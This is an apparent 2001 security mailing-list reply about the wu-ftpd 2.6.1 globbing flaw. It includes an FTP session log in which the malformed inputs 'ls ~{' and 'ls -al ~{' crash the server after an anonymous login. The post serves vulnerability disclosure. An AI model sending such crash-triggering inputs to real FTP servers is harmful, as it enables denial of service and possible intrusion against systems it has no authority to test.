On Fri, 30 Nov 2001, Hasan Azam Diwan wrote:

> Darwin's ftpd is not vulnerable... the "ls ~{" command returns a list of ~root.
>

[testeXXX teste]$ ftp test.somehost.com
Connected to test.somehost.com.
220 Test.somehost.com FTP server (Version wu-2.6.1-16.7x.1) ready.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
KERBEROS_V4 rejected as an authentication type
Name (test:teste): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230-The response 'baubau' is not valid
230-Next time please use your e-mail address as your password
230- for example: joetest.somehost.com
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (194,105,27,22,166,166)
550 Missing }
ftp> ls -al ~{
Segmentation fault (core dumped)

        As you can see the problem still exist, even if updates are done.

Goba

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]